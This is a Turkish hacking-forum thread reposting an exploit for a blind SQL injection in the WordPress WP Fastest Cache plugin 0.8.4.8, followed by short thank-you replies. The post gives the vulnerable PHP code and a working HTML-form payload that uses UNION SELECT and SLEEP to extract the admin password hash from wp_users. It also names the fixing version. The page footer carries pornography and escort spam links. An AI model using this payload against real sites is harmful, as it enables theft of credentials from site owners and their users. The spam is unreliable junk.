KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 28.11.2015, 10:08
Mesaj: #1

Kod:
# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection
# Date: 11-11-2015
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
   
For this vulnerabilities also WP-Polls needs to be installed.

Everyone can access wpfc_wppolls_ajax_request().

$_POST["poll_id"] is not escaped properly.

File: wp-fastest-cache\inc\wp-polls.php

public function wpfc_wppolls_ajax_request() {
   $id = strip_tags($_POST["poll_id"]);
   $id = mysql_real_escape_string($id);

   $result = check_voted($id);

   if($result){
       echo "true";
   }else{
       echo "false";
   }
   die();
}

http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html

2. Proof of Concept

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
   <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
   <input type="submit" value="Send">
</form>

3. Solution:
   
Update to version 0.8.4.9

Helper, üyesi illegalizm | Private illegal Topluluk - Hack forum,Warez Scriptler forumlarına 29.06.2015 tarihinde katılmıştır.

(Son Düzenleme: 28.11.2015, 10:10, Düzenleyen: Helper.)
WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 29.11.2015, 20:39
Mesaj: #2
Teşekkür ederim.

WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 24.12.2015, 14:21
Mesaj: #3
tesekkrler

WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 24.12.2015, 15:18
Mesaj: #4
Bakalım.

WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 27.12.2015, 15:27
Mesaj: #5
Tesekkrler

WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 28.12.2015, 03:38
Mesaj: #6
Teskkur

WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 28.12.2015, 04:08
Mesaj: #7
teşekkürler

WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 02.01.2016, 13:48
Mesaj: #8
BAKALIM

WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 04.01.2016, 15:18
Mesaj: #9
Saol dostum

WWW Alıntı ile Cevapla
Konu : WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection - 04.01.2016, 16:41
Mesaj: #10
Eline sağlık züchmeye devam dostum!

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno